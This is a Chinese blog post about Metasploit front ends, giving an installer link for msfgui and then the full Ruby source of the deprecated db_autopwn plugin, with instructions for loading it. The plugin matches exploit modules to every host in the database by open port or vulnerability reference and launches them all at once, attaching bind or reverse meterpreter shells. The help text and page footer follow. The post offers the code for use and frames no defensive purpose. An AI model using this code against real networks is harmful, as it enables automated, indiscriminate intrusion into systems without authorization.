`

metasploit 图形化界面和自动化exploit脚本

 
阅读更多

0x01 最新版的metasploit没了图形化界面,

             armitage开始收费

             那我们就选用msfgui吧,安装简单 

              https://raw.github.com/scriptjunkie/msfgui/master/msfgui-installer.exe

              下载安装就可以了

 

 

0x02   以前有的db_autopwn,新版也取消了。只能自己下一个,然后load进去就可以用了,默认路径在\metasploit\apps\pro\msf3\plugins 这里。

 

module Msf
module Ui
module Console
module CommandDispatcher
class Plugin::AutoPWN < Msf::Plugin
	#
	# The plugin description for Msf::Plugin
	#
	def desc
		"DB AutoPWN"
	end

	#
	# The dispatcher's name.
	#
	def name
		"DB AutoPWN"
	end

	def initialize(framework, opts)
		super

		add_console_dispatcher(AutoPWN)
	end

	class AutoPWN

		require 'tempfile'

		include Msf::Ui::Console::CommandDispatcher


		#
		# Constants
		#

		PWN_SHOW = 2**0
		PWN_XREF = 2**1
		PWN_PORT = 2**2
		PWN_EXPL = 2**3
		PWN_SING = 2**4
		PWN_SLNT = 2**5
		PWN_VERB = 2**6

		#
		# The dispatcher's name.
		#
		def name
			"DB AutoPWN"
		end

		#
		# Returns the hash of commands supported by this dispatcher.
		#
		def commands
			# Always include commands that only make sense when connected.
			# This avoids the problem of them disappearing unexpectedly if the
			# database dies or times out.  See #1923
			base = {
				"db_autopwn"    => "Automatically exploit everything",
			}
		end

		#
		# Returns true if the db is connected, prints an error and returns
		# false if not.
		#
		# All commands that require an active database should call this before
		# doing anything.
		#
		def active?
			if not framework.db.active
				print_error("Database not connected")
				return false
			end
			true
		end

		#
		# A shotgun approach to network-wide exploitation
		# Officially deprecated as of 4.1
		#
		# Forked for those who still want it and understand it's limitations/issues
		#

		def cmd_db_autopwn(*args)
			return unless active?

			print_error("")
			print_error("Warning: The db_autopwn command is not officially supported and exists only in a branch.")
			print_error("         This code is not well maintained, crashes systems, and crashes itself.")
			print_error("         Use only if you understand it's current limitations/issues.")
			print_error("         ISSUES/REQUESTS SHOULD GO TO NEINWECHTER VIA GITHUB")
			print_error("")

			stamp = Time.now.to_f
			vcnt  = 0
			rcnt  = 0
			mode  = 0
			code  = :bind
			mjob  = 5
			regx  = nil
			minrank = nil
			maxtime = 120

			port_inc = []
			port_exc = []

			targ_inc = []
			targ_exc = []

			args.push("-h") if args.length == 0

			while (arg = args.shift)
				case arg
				when '-t'
					mode |= PWN_SHOW
				when '-x'
					mode |= PWN_XREF
				when '-p'
					mode |= PWN_PORT
				when '-e'
					mode |= PWN_EXPL
				when '-s'
					mode |= PWN_SING
				when '-q'
					mode |= PWN_SLNT
				when '-v'
					mode |= PWN_VERB
				when '-j'
					mjob = args.shift.to_i
				when '-r'
					code = :conn
				when '-b'
					code = :bind
				when '-I'
					tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ])
					range = args.shift
					if not tmpopt.valid?(range)
						print_error("Invalid range for -I")
						return
					end
					targ_inc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range))
				when '-X'
					tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ])
					range = args.shift
					if not tmpopt.valid?(range)
						print_error("Invalid range for -X")
						return
					end
					targ_exc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range))
				when '-PI'
					port_inc = Rex::Socket.portspec_to_portlist(args.shift)
				when '-PX'
					port_exc = Rex::Socket.portspec_to_portlist(args.shift)
				when '-m'
					regx = args.shift
				when '-R'
					minrank = args.shift
				when '-T'
					maxtime = args.shift.to_f
				when '-h','--help'
					print_status("Usage: db_autopwn [options]")
					print_line("\t-h          Display this help text")
					print_line("\t-t          Show all matching exploit modules")
					print_line("\t-x          Select modules based on vulnerability references")
					print_line("\t-p          Select modules based on open ports")
					print_line("\t-e          Launch exploits against all matched targets")
#					print_line("\t-s          Only obtain a single shell per target system (NON-FUNCTIONAL)")
					print_line("\t-r          Use a reverse connect shell")
					print_line("\t-b          Use a bind shell on a random port (default)")
					print_line("\t-q          Disable exploit module output")
					print_line("\t-R  [rank]  Only run modules with a minimal rank")
					print_line("\t-I  [range] Only exploit hosts inside this range")
					print_line("\t-X  [range] Always exclude hosts inside this range")
					print_line("\t-PI [range] Only exploit hosts with these ports open")
					print_line("\t-PX [range] Always exclude hosts with these ports open")
					print_line("\t-m  [regex] Only run modules whose name matches the regex")
					print_line("\t-T  [secs]  Maximum runtime for any exploit in seconds")
					print_line("")
					return
				end
			end

			minrank = minrank || framework.datastore['MinimumRank'] || 'manual'
			if ! RankingName.values.include?(minrank)
				print_error("MinimumRank invalid!  Possible values are (#{RankingName.sort.map{|r|r[1]}.join("|")})")
				wlog("MinimumRank invalid, ignoring", 'core', LEV_0)
				return
			else
				minrank = RankingName.invert[minrank]
			end

			# Default to quiet mode
			if (mode & PWN_VERB == 0)
				mode |= PWN_SLNT
			end

			matches    = {}
			refmatches = {}

			# Pre-allocate a list of references and ports for all exploits
			mrefs  = {}
			mports = {}
			mservs = {}

			# A list of jobs we spawned and need to wait for
			autopwn_jobs = []

			[ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype|
				mtype[0].each_module do |modname, mod|
					o = mod.new

					if(mode & PWN_XREF != 0)
						o.references.each do |r|
							next if r.ctx_id == 'URL'
							ref = r.ctx_id + "-" + r.ctx_val
							ref.upcase!

							mrefs[ref] ||= {}
							mrefs[ref][o.fullname] = o
						end
					end

					if(mode & PWN_PORT != 0)
						if(o.datastore['RPORT'])
							rport = o.datastore['RPORT']
							mports[rport.to_i] ||= {}
							mports[rport.to_i][o.fullname] = o
						end

						if(o.respond_to?('autofilter_ports'))
							o.autofilter_ports.each do |rport|
								mports[rport.to_i] ||= {}
								mports[rport.to_i][o.fullname] = o
							end
						end

						if(o.respond_to?('autofilter_services'))
							o.autofilter_services.each do |serv|
								mservs[serv] ||= {}
								mservs[serv][o.fullname] = o
							end
						end
					end
				end
			end


			begin

			framework.db.hosts.each do |host|
				xhost = host.address
				next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost))
				next if (targ_exc.length > 0 and range_include?(targ_exc, xhost))

				if(mode & PWN_VERB != 0)
					print_status("Scanning #{xhost} for matching exploit modules...")
				end

				#
				# Match based on vulnerability references
				#
				if (mode & PWN_XREF != 0)

					host.vulns.each do |vuln|

						# Faster to handle these here
						serv = vuln.service
						xport = xprot = nil

						if(serv)
							xport = serv.port
							xprot = serv.proto
						end

						vuln.refs.each do |ref|
							mods = mrefs[ref.name.upcase] || {}
							mods.each_key do |modname|
								mod = mods[modname]
								next if minrank and minrank > mod.rank
								next if (regx and mod.fullname !~ /#{regx}/)

								if(xport)
									next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i))
									next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i))
								else
									if(mod.datastore['RPORT'])
										next if (port_inc.length > 0 and not port_inc.include?(mod.datastore['RPORT'].to_i))
										next if (port_exc.length > 0 and port_exc.include?(mod.datastore['RPORT'].to_i))
									end
								end

								next if (regx and mod.fullname !~ /#{regx}/)

								mod.datastore['RPORT'] = xport if xport
								mod.datastore['RHOST'] = xhost

								filtered = false
								begin
									::Timeout.timeout(2, ::RuntimeError) do
										filtered = true if not mod.autofilter()
									end
								rescue ::Interrupt
									raise $!
								rescue ::Timeout::Error
									filtered = true
								rescue ::Exception
									filtered = true
								end
								next if filtered

								matches[[xport,xprot,xhost,mod.fullname]]=true
								refmatches[[xport,xprot,xhost,mod.fullname]] ||= []
								refmatches[[xport,xprot,xhost,mod.fullname]] << ref.name
							end
						end
					end
				end

				#
				# Match based on open ports
				#
				if (mode & PWN_PORT != 0)
					host.services.each do |serv|
						next if not serv.host
						next if (serv.state != ServiceState::Open)

						xport = serv.port.to_i
						xprot = serv.proto
						xname = serv.name

						next if xport == 0

						next if (port_inc.length > 0 and not port_inc.include?(xport))
						next if (port_exc.length > 0 and port_exc.include?(xport))

						mods = mports[xport.to_i] || {}

						mods.each_key do |modname|
							mod = mods[modname]
							next if minrank and minrank > mod.rank
							next if (regx and mod.fullname !~ /#{regx}/)
							mod.datastore['RPORT'] = xport
							mod.datastore['RHOST'] = xhost

							filtered = false
							begin
								::Timeout.timeout(2, ::RuntimeError) do
									filtered = true if not mod.autofilter()
								end
							rescue ::Interrupt
								raise $!
							rescue ::Exception
								filtered = true
							end

							next if filtered
							matches[[xport,xprot,xhost,mod.fullname]]=true
						end

						mods = mservs[xname] || {}
						mods.each_key do |modname|
							mod = mods[modname]
							next if minrank and minrank > mod.rank
							next if (regx and mod.fullname !~ /#{regx}/)
							mod.datastore['RPORT'] = xport
							mod.datastore['RHOST'] = xhost

							filtered = false
							begin
								::Timeout.timeout(2, ::RuntimeError) do
									filtered = true if not mod.autofilter()
								end
							rescue ::Interrupt
								raise $!
							rescue ::Exception
								filtered = true
							end

							next if filtered
							matches[[xport,xprot,xhost,mod.fullname]]=true
						end
					end
				end
			end

			rescue ::Exception => e
				print_status("ERROR: #{e.class} #{e} #{e.backtrace}")
				return
			end

			if (mode & PWN_SHOW != 0)
				print_status("Analysis completed in #{(Time.now.to_f - stamp).to_i} seconds (#{vcnt} vulns / #{rcnt} refs)")
				print_status("")
				print_status("=" * 80)
				print_status(" " * 28 + "Matching Exploit Modules")
				print_status("=" * 80)

				matches.each_key do |xref|
					mod = nil
					if ((mod = framework.modules.create(xref[3])) == nil)
						print_status("Failed to initialize #{xref[3]}")
						next
					end

					if (mode & PWN_SHOW != 0)
						tport = xref[0] || mod.datastore['RPORT']
						if(refmatches[xref])
							print_status("  #{xref[2]}:#{tport}  #{xref[3]}  (#{refmatches[xref].join(", ")})")
						else
							print_status("  #{xref[2]}:#{tport}  #{xref[3]}  (port match)")
						end
					end

				end
				print_status("=" * 80)
				print_status("")
				print_status("")
			end

			ilog("db_autopwn: Matched #{matches.length} modules")

			idx = 0
			matches.each_key do |xref|

				idx += 1

				begin
					mod = nil

					if ((mod = framework.modules.create(xref[3])) == nil)
						print_status("Failed to initialize #{xref[3]}")
						next
					end

					#
					# The code is just a proof-of-concept and will be expanded in the future
					#
					if (mode & PWN_EXPL != 0)

						mod.datastore['RHOST'] = xref[2]

						if(xref[0])
							mod.datastore['RPORT'] = xref[0].to_s
						end

						if (code == :bind)
							mod.datastore['LPORT']   = (rand(0x8fff) + 4000).to_s
							if(mod.fullname =~ /\/windows\//)
								mod.datastore['PAYLOAD'] = 'windows/meterpreter/bind_tcp'
							else
								mod.datastore['PAYLOAD'] = 'generic/shell_bind_tcp'
							end
						end

						if (code == :conn)
							mod.datastore['LHOST']   = 	Rex::Socket.source_address(xref[2])
							mod.datastore['LPORT']   = 	(rand(0x8fff) + 4000).to_s

							if (mod.datastore['LHOST'] == '127.0.0.1')
								print_status("Failed to determine listener address for target #{xref[2]}...")
								next
							end

							if(mod.fullname =~ /\/windows\//)
								mod.datastore['PAYLOAD'] = 'windows/meterpreter/reverse_tcp'
							else
								mod.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
							end
						end


						if(framework.jobs.keys.length >= mjob)
							print_status("Job limit reached, waiting on modules to finish...")
							while(framework.jobs.keys.length >= mjob)
								::IO.select(nil, nil, nil, 0.25)
							end
						end

						print_status("(#{idx}/#{matches.length} [#{framework.sessions.length} sessions]): Launching #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...")

						autopwn_jobs << framework.threads.spawn("AutoPwnJob#{xref[3]}", false, mod) do |xmod|
							begin
							stime = Time.now.to_f
							::Timeout.timeout(maxtime) do
									inp = (mode & PWN_SLNT != 0) ? nil : driver.input
									out = (mode & PWN_SLNT != 0) ? nil : driver.output

									case xmod.type
									when MODULE_EXPLOIT
										xmod.exploit_simple(
											'Payload'        => xmod.datastore['PAYLOAD'],
											'LocalInput'     => inp,
											'LocalOutput'    => out,
											'RunAsJob'       => false)
									when MODULE_AUX
										xmod.run_simple(
											'LocalInput'     => inp,
											'LocalOutput'    => out,
											'RunAsJob'       => false)
									end
								end

							rescue ::Timeout::Error
								print_status(" >> autopwn module timeout from #{xmod.fullname} after #{Time.now.to_f - stime} seconds")
							rescue ::Exception
								print_status(" >> autopwn exception during launch from #{xmod.fullname}: #{$!} ")
							end
						end
					end

				rescue ::Interrupt
					raise $!

				rescue ::Exception
					print_status(" >> autopwn exception from #{xref[3]}: #{$!} #{$!.backtrace}")
				end
			end

			# Wait on all the jobs we just spawned
			while (not autopwn_jobs.empty?)
				# All running jobs are stored in framework.jobs.  If it's
				# not in this list, it must have completed.
				autopwn_jobs.delete_if { |j| not j.alive? }

				print_status("(#{matches.length}/#{matches.length} [#{framework.sessions.length} sessions]): Waiting on #{autopwn_jobs.length} launched modules to finish execution...")
				::IO.select(nil, nil, nil, 5.0)
			end

			if (mode & PWN_SHOW != 0 and mode & PWN_EXPL != 0)
				print_status("The autopwn command has completed with #{framework.sessions.length} sessions")
				if(framework.sessions.length > 0)
					print_status("Enter sessions -i [ID] to interact with a given session ID")
					print_status("")
					print_status("=" * 80)
					driver.run_single("sessions -l -v")
					print_status("=" * 80)
				end
			end
			print_line("")
		# EOM
		end
	end
end
end
end
end
end

 

常见帮住

 

写道
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it's current limitations/issues.
[-] ISSUES/REQUESTS SHOULD GO TO NEINWECHTER VIA GITHUB
[-]
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds

 

分享到:
评论

相关推荐

    metasploit自动化渗透攻击模块

    metasploit自动化渗透攻击模块db_autopwn

    Metasploit-The Exploit Learning Tree

    Metasploit的功能十分强大,它不仅提供了控制台命令行界面(msfconsole),还支持脚本和GUI界面。 在Metasploit框架中,“Exploit Learning Tree”文档介绍了如何深入理解和使用Metasploit,它不仅向用户展示了如何...

    毒蛇:metasploit-framework图形界面图形化内网渗透工具

    【毒蛇:Metasploit-Framework图形界面图形化内网渗透工具】 毒蛇,全称为Viper,是一款基于Python开发的Metasploit-Framework的图形界面工具,它为红队和安全研究人员提供了一个友好的界面,用于管理和执行渗透...

    metasploit:自动运行Metasploit脚本

    在自动化过程中,可能还会涉及到创建自定义模块,使用工作流管理工具(如Rake或Ansible)来协调任务,甚至编写脚本自动化整个渗透测试过程。这需要对Ruby编程和Metasploit API有深入理解。 标签"Shell"表明本文主要...

    RapidPayload:Metasploit Framework的简单图形用户界面(GUI)透明注释和有效载荷| Termux | x11

    **RapidPayload** 是一个基于 **Metasploit Framework** 的工具,它提供了一个简洁的图形用户界面(GUI),使得在渗透测试和安全研究过程中创建和管理有效载荷变得更加直观和高效。Metasploit Framework 是一个广泛...

    Metasploit_Exploit_pitchw9a_渗透工具_metasploit_

    Metasploit是一款强大的渗透测试工具,其核心在于Exploit框架,可以有效地帮助网络安全专业人员发现、分析和利用系统漏洞。"pitchw9a"可能指的是一个特定的漏洞或exploit模块,它可能是Metasploit框架中的一个重要...

    Metasploit使用教程[汇编].pdf

    Metasploit 使用教程汇编 ...Metasploit 是一个功能强大的渗透测试工具包,提供了一个强大的框架,用于自动化渗透测试和漏洞利用。通过学习 Metasploit 的使用教程,我们可以更好地理解 Metasploit 的使用方法和原理。

    metasploit 使用心得笔记

    Metasploit Framework(MSF)允许用户以多种方式使用框架,包括图形用户界面(GUI)、控制台界面(console)、命令行界面(CLI),但不支持WEB模式。 搭建Metasploit环境有Windows和Linux两种平台的安装方式。在...

    metasploit

    Armitage是一个图形化的界面,简化了Metasploit的操作,特别适合初学者。它提供了一种网络地图视图,清晰展示主机关系,便于管理和组织攻击。 1. **快速攻击**:Armitage提供了预定义的攻击链路,点击即可启动整个...

    MetaSploit渗透攻击平台

    4. **易于使用的图形界面**:除了命令行界面之外,MetaSploit还提供了图形界面版本Armitage,使得非专业技术人员也能轻松上手。 5. **社区支持**:拥有活跃的开发者和用户社区,不断贡献新的模块和改进意见,确保...

    Metasploit

    8. **自动化与脚本编写**:Metasploit支持Ruby语言,用户可以通过编写脚本来自动化渗透测试过程,提高效率。 9. **防御策略**:书中也会介绍如何利用Metasploit来模拟攻击,从而测试并强化自己的防御体系,找出安全...

    metasploit教程

    7. **自动化与脚本**:Metasploit支持自定义脚本和模块,以实现自动化渗透测试流程。教程将解释如何编写和使用Ruby脚本来扩展Metasploit的功能。 8. **防御与安全建议**:除了攻击,教程也会讨论如何防范Metasploit...

    Metasploit开发指南

    Metasploit框架中,所有的渗透测试数据和会话状态都被序列化存储,以便于持久化和恢复。 Metasploit的用户界面(Framework UI)部分则可能涉及到如何与Metasploit的控制台或图形用户界面(GUI)进行交互,以便于...

    metasploit 中文开发教程

    7. **自动化脚本**:Metasploit支持Ruby编程语言,允许用户编写自定义脚本来自动化渗透测试流程。 8. **社区支持**:作为开源项目,Metasploit拥有庞大的开发者和用户社区,不断更新和改进工具,提供最新的安全信息...

    Metasploit Framework基础介绍及下载

    - **自动化与定制化**:除了提供现成的exploit模块外,MSF还支持高度定制化的攻击方案,允许用户根据具体需求构建独特的攻击策略。 - **易用性**:MSF界面友好,无论是通过命令行还是图形界面(如Armitage),都能够...

    metasploit-framework-6.4.12.zip

    - **API 和集成**:可能改进了与外部工具(如Nmap、Burp Suite等)的集成,增强自动化渗透测试的能力。 - **用户体验**:界面和命令行可能有改进,提供更友好的交互体验。 3. **Metasploit Framework 的使用** -...

    Metasploit's Guide

    此外,本书还会指导读者如何将Nmap、NeXpose和Nessus等工具与Metasploit集成,实现自动化的漏洞发现过程。Meterpreter是一个高级的shell,可以用来从网络内部发起进一步攻击。书中还探讨了如何利用Metasploit的各种...

    从Vulnerability_到Exploit为Metasploit写插件

    - 模糊测试是一种自动化或半自动化的技术,通过向目标系统发送大量无效、随机或意外的数据,旨在触发未预见的程序行为,从而发现潜在的安全漏洞。在本案例中,模糊测试用于确定能够触发缓冲区溢出的具体输入量。 2...

Global site tag (gtag.js) - Google Analytics